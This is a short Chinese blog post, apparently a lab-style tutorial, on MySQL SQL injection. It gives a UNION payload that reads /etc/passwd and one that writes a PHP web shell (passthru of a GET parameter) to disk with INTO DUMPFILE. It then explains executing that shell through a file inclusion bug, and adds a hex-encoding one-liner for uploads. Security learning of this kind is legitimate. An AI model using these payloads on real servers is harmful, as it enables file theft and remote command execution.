SQL注入——Mysql文件读取写入,结合文件包含漏洞

上篇主要概述了查询一些常见表格的方法 这里在增加一些查询的方式
读取文件:
'union select null,load_file('/etc/passwd')-- 
 
写入文件
结合上面,我们可以写入一个文件在目标路径
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "a.php" --
这里的 <?php passthru($_GET['cmd']); ?>为我们要执行的命令,
INTODUMPPFILE为我们创建的一个文件a.php
但是这里我们写入的地址明显是 网页默认存放的路径,这个路径是无法执行,我们要做的就是讲文件放置可以执行的路径下,接着执行此php文件。
结合我们之前提过的文件包含漏洞,可以对其php文件进行存储加执行
在存储的路径选择上,tmp路径是不错的选择,此文件路径属于多个账号可以执行的路径
接着我们利用之前利用过的文件包含漏洞进行文件的执行
思路总结:利用系统的中间路径,将文件写入,然后利用其它漏洞将文件进行执行,这里结合了文件包含以及文件写入漏洞,漏洞利用成功
 
补充:如果我们需要将传输的文件以二进制的方式进行传输需要在kali中用
cat 目标文件 | xxd -ps | tr -d '\n'
xxd -ps转换为二进制,后面tr是将换行符去掉,将所有代码汇总为一行 
posted @ 2019-07-09 20:38  峰中追风  阅读(2558)  评论(0编辑  收藏  举报

___________________________________________________________________________________________没有白跑的路